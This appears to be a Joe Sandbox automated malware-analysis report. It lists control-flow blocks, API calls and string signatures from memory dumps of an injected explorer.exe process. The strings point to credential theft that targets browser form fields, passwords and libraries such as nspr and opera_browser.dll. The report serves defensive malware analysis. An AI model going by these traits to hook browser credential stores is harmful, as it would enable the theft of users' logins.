Nodes (block id: address range, API or call in block):
• 421: f8f92dd-f8f9320, call f904942
• 424: f8f93fa-f8f940e
• 425: f8f9326
• 426: f8f9328-f8f9339, SleepEx
• 427: f8f933b-f8f9341
• 428: f8f934b-f8f9352
• 429: f8f9343-f8f9349
• 430: f8f935c-f8f936a, call f903f12
• 431: f8f9354-f8f935a
• 432: f8f9370-f8f9376
• 434: f8f9378-f8f937e
• 435: f8f93b7-f8f93bd
• 437: f8f9380-f8f938a
• 438: f8f93bf-f8f93cf, call f8f9e72
• 439: f8f93d4-f8f93db
• 440: f8f938c-f8f93b1, call f8fa432
• 442: f8f93e1-f8f93f5, call f8f90f2
Edges: 421->424, 421->425, 425->426, 426->426, 426->427, 427->428, 427->429, 428->431, 428->432, 429->428, 429->430, 430->432, 431->430, 431->432, 432->434, 432->435, 434->435, 434->437, 435->438, 435->439, 437->435, 437->440, 438->439, 439->426, 439->442, 440->435, 442->426
APIs
Memory Dump Source
• Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction ID: d973b8d4cee4ebefa4b99e7277c7da4fb539a96e5231a30a666cfef7024c0797
• Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction Fuzzy Hash: 32316C74504B09DFDB68EF2984883E5B7A0FB54304F84527ECA2DCA147C774A058CF92
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Nodes (block id: address range, API or call in block):
• 457: f8f9412-f8f9446, call f904942
• 460: f8f9448-f8f9472, call f906c9e, CreateThread
• 461: f8f9473-f8f947d
Edges: 457->460, 457->461
APIs
Memory Dump Source
• Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction ID: 3446f4356ddb6f8b9e07099efde3d48386be39a6c8967a0bf35434dca1101386
• Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction Fuzzy Hash: 6CF0C230268B484FD788EB2CD84566AB3D0EBE9214F44063EA64DC72A5DA29D5818756
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
• API String ID: 0-393284711
• Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction ID: e26f0d25ce6365a6a0a7d032d0f01997b857534ab75d59feff1ef4059a05ce6f
• Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction Fuzzy Hash: 54E16B70618B488FD7A4EF68C4947ABB7E0FB58300F804A2E999BC7251DF34A541CB89
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
• API String ID: 0-393284711
• Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction ID: 0f7df12fffbf59c484693136f8ee6df5e2f8f1280af70b40fb021102081c37c7
• Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction Fuzzy Hash: 5EE15A74618B488FCBA9DF68C4957ABB7E0FF58300F504A2EA59BC7251DF30A541CB85
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
Similarity
• API ID:
• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
• API String ID: 0-2916316912
• Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction ID: 9427332ca8653dc2236663869d85705d4774f31295a998f7291172016797670b
• Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction Fuzzy Hash: 80B17B30528B488BDB54EF698485AEAB7F1FF98300F90452ED89AC7252EF749505CB86
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
Similarity
• API ID:
• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
• API String ID: 0-2916316912
• Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction ID: 4de691a6b479731392d7b0b85761496a2ed15b281b52927391b2fb6dce8f2dff
• Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction Fuzzy Hash: 30B16A30618B488EDB59EF68C496AEEB7F1FF98300F50451EE49AC7251EF70A505CB86
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
Similarity
• API ID:
• String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
• API String ID: 0-1539916866
• Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
• Instruction ID: 4bca3070d9559a73b77b67c89a9d258ce71e0db443c5086ca7299a9618e90c2c
• Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
• Instruction Fuzzy Hash: 46419270A18B08CFDB18DF88A4596AE7BE6FB48700F40025ED809D7346DB75AD458BD6
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
Similarity
• API ID:
• String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
• API String ID: 0-1539916866
• Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
• Instruction ID: eb32102ec4f65628a74417fc9755b2e37163b5dd8b59ae7459072fa51fa4964e
• Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
• Instruction Fuzzy Hash: 2841AFB0A18B0C8FDB14EF88A4567AD7BE6EB48704F00025EE409D3345DBB5AD458BD6
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
Similarity
• API ID:
• String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
• API String ID: 0-355182820
• Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
• Instruction ID: b181c7f8b5ae11e7e3494952311a15bd266f255e28b704671ed4b5a76d8305e9
• Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
• Instruction Fuzzy Hash: 46C17D70218B198FC798EF28D4856EAF3E1FB94304F80472E989AC7201DF74E655CB86
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
Similarity
• API ID:
• String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
• API String ID: 0-355182820
• Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
• Instruction ID: 34bf77e549c8f33812216b547b6fe4028b48d09ca4c5e5fb040022fa452d5478
• Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
• Instruction Fuzzy Hash: B6C15B74218B099FC759EF64C896BDAF3E5FB98304F40472EA49AC7250DF30A915CB86
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
Similarity
• API ID:
• String ID: .$0$c$n$r$r$r$r$r$r$r$r
• API String ID: 0-97273177
• Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
• Instruction ID: 6f92e254ad84f78a4fdf5c0fbc6ff48393954f84e26b09870ad0900898461e91
• Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
• Instruction Fuzzy Hash: 9751D3305187488FD759DF18D8852AAB7E5FBC5700F901A3EE8CBC7242DBB49906CB82
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
Similarity
• API ID:
• String ID: .$0$c$n$r$r$r$r$r$r$r$r
• API String ID: 0-97273177
• Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
• Instruction ID: 93e2c54fa3b37274441186435cf858a4b6f2a650b7e4812a023ec7c9376ab0b9
• Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
• Instruction Fuzzy Hash: 5851B47161C7488FD719CF18D8917AAB7E5FB85700F50192EE8DB87241DBB49906CB82
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
Similarity
• API ID:
• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
• API String ID: 0-639201278
• Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
• Instruction ID: 8b0fa25c45ff2df36f0b6013060f2c4e7a385d30d3762b40eac4e496fc9f9789
• Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
• Instruction Fuzzy Hash: 90C19071618B194FC758EF69D455AAAB3E1FB98300F81432E984EC7252DF38EA06C785
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
Similarity
• API ID:
• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
• API String ID: 0-639201278
• Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
• Instruction ID: 3e40f7143a456bfbe5eb21c31bbc50a976a5eb5c18bb34ae07465f59c3c14dfb
• Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
• Instruction Fuzzy Hash: 71C19071618B194FC758EF69D455AEAB3E1FB98300F81432E984AC7252DF38EA06C785
Uniqueness
Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                            • API String ID: 0-639201278
                                                                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                            • Instruction ID: 58b7c3f90fd4eac3ccd163c9e3c96ac65d0d25ee393c802d5613ddeceae1c4ef
                                                                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                            • Instruction Fuzzy Hash: 6BC18175618A198FC749EF68D466BAAF3E5FB98300F91432EA44EC7250EF30E941C785
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                            • API String ID: 0-639201278
                                                                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                            • Instruction ID: 2e316637e5e41f06a8ce5d05903d4359090dffec666d73bedf8fb5b747f2879f
                                                                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                            • Instruction Fuzzy Hash: FEC18175618A198FC749EF68D466BAAF3E5FB98300F91432E944AC7250EF30E901C7C5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                            • API String ID: 0-2058692283
                                                                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                            • Instruction ID: 1a6eb02ed7ac7ba1aa457b3121c8c69e8163e2a531c5ef9f95a3f8eea12711c8
                                                                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                            • Instruction Fuzzy Hash: F9A1AF706187588BDB18EFA894447EEB7F1FF88304F40462EE88AD7252EF749545CB89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                            • API String ID: 0-2058692283
                                                                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                            • Instruction ID: b07026508a8ac78bb2dd25647be2ad32385f27d5b27048a7d2f77083614a7427
                                                                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                            • Instruction Fuzzy Hash: B0A1BC706187488FDB19DFA89455BEEB7E1FF88300F40462EE48AD7291EF709945C789
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                            • API String ID: 0-2058692283
                                                                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                            • Instruction ID: c397294891156aeac2f03e4ce421a1c0848e31afee8c48884ca9e68a6b15ea90
                                                                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                            • Instruction Fuzzy Hash: E0919F706187588BDB18EFA8D4447EEB7F1FB88304F40462EE88AD7252EF749545CB89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                            • API String ID: 0-2058692283
                                                                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                            • Instruction ID: c77b1fe7535200d5a3651f8788fa42c2d796429283af770142aa701be294c1ab
                                                                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                            • Instruction Fuzzy Hash: AF917C70A187488FDB19DFA8D455BEEB7E1FB88300F40462EE48AD7251EF709945C789
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $.$e$n$v
                                                                                            • API String ID: 0-1849617553
                                                                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                            • Instruction ID: 8a6a734a9747f04a711fdef44de4a49ab18de0cd5f80ddf8a98f89c91f125bd4
                                                                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                            • Instruction Fuzzy Hash: 5D7161316187488FD758EF68D4887AAB7F1FF98304F40062FD84AC7262EF75A9458B85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $.$e$n$v
                                                                                            • API String ID: 0-1849617553
                                                                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                            • Instruction ID: ed9a32949cafd070be9a7ac4d8b1e1c99783e70984ae01e6c0c0dcc6a930c805
                                                                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                            • Instruction Fuzzy Hash: 03718F31618A498FD758DFA8C4957AAB7F1FF98304F00062FE44AC7261EF71E9458B85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                            • API String ID: 0-1970020201
                                                                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                            • Instruction ID: 11cd6ab6ad729e24a4fb2f8261049aa128533b84796788b0051ba53fc960bf6a
                                                                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                            • Instruction Fuzzy Hash: 17514CB0918B4C8BDB54EFA4D044AEEB7F1FF58300F40462E989AE7215EF709645CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                            • API String ID: 0-1970020201
                                                                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                            • Instruction ID: 6fbaf7ca3a34ee00d1c27a9cee61b2b3531708ac20947bbbcc938cfad6a345ad
                                                                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                            • Instruction Fuzzy Hash: 16514AB0918B4C8BDB55DFA4C455BEEB7E1FF58300F40462EA49AE7254EF30A5418B89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4$\$dll$ion.$vers
                                                                                            • API String ID: 0-1610437797
                                                                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                            • Instruction ID: 6344fe1b3071b31b71c7ff325dd1e052e7d430bada88b9773c3bc2552df0331c
                                                                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                            • Instruction Fuzzy Hash: 05417F30618B888BDBA5EF2498457EBB7E4FB98341F40462E988EC7241EF70D605C782
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4$\$dll$ion.$vers
                                                                                            • API String ID: 0-1610437797
                                                                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                            • Instruction ID: b786f01cadd3eeeca6ffeae1de1107f9187e32ee16da4c6d3d2e5e48d12fa233
                                                                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                            • Instruction Fuzzy Hash: 20416034218B4C8BCBA9EF2498557EA73E4FB98301F51462E989EC7241EF30D945C782
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 32.d$cli.$dll$sspi$user
                                                                                            • API String ID: 0-327345718
                                                                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                            • Instruction ID: f028fd180747872a4c7afe4babb9b4b4ec7188e577647273d45a2e73ae13b0fc
                                                                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                            • Instruction Fuzzy Hash: 91415A31A18E0D8FDB94EF6880A47AE77E1FB58310F84016AEC0AE7312DA75D5418B86
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 32.d$cli.$dll$sspi$user
                                                                                            • API String ID: 0-327345718
                                                                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                            • Instruction ID: 36fe9db9c018a291e10e86efc059b2397b20d551616d371c7191fb505cf2eb7d
                                                                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                            • Instruction Fuzzy Hash: F9416A31A19F0D8FCB89EF6880A57AD73E5FB68305F51416FA80AD7304DA30D9808B82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$el32$h$kern
                                                                                            • API String ID: 0-4264704552
                                                                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                            • Instruction ID: 918077e276c6948420a55d6cd4c1139090bbc2b5a7364cd862b5f19c46483446
                                                                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                            • Instruction Fuzzy Hash: A1417F70608B488FD7A9DF2984843ABBBE1FB98300F504A6F989EC3656DB70D545CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$el32$h$kern
                                                                                            • API String ID: 0-4264704552
                                                                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                            • Instruction ID: b46b95bf0de0b72901ba63c1a3dbc0c0368e7c9ebd89e92c4d32ab2fb787cd72
                                                                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                            • Instruction Fuzzy Hash: 06418270608B4D8FD799DF28C4A53AAB7E1FB98340F144A2FA49EC3265DB70D945CB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
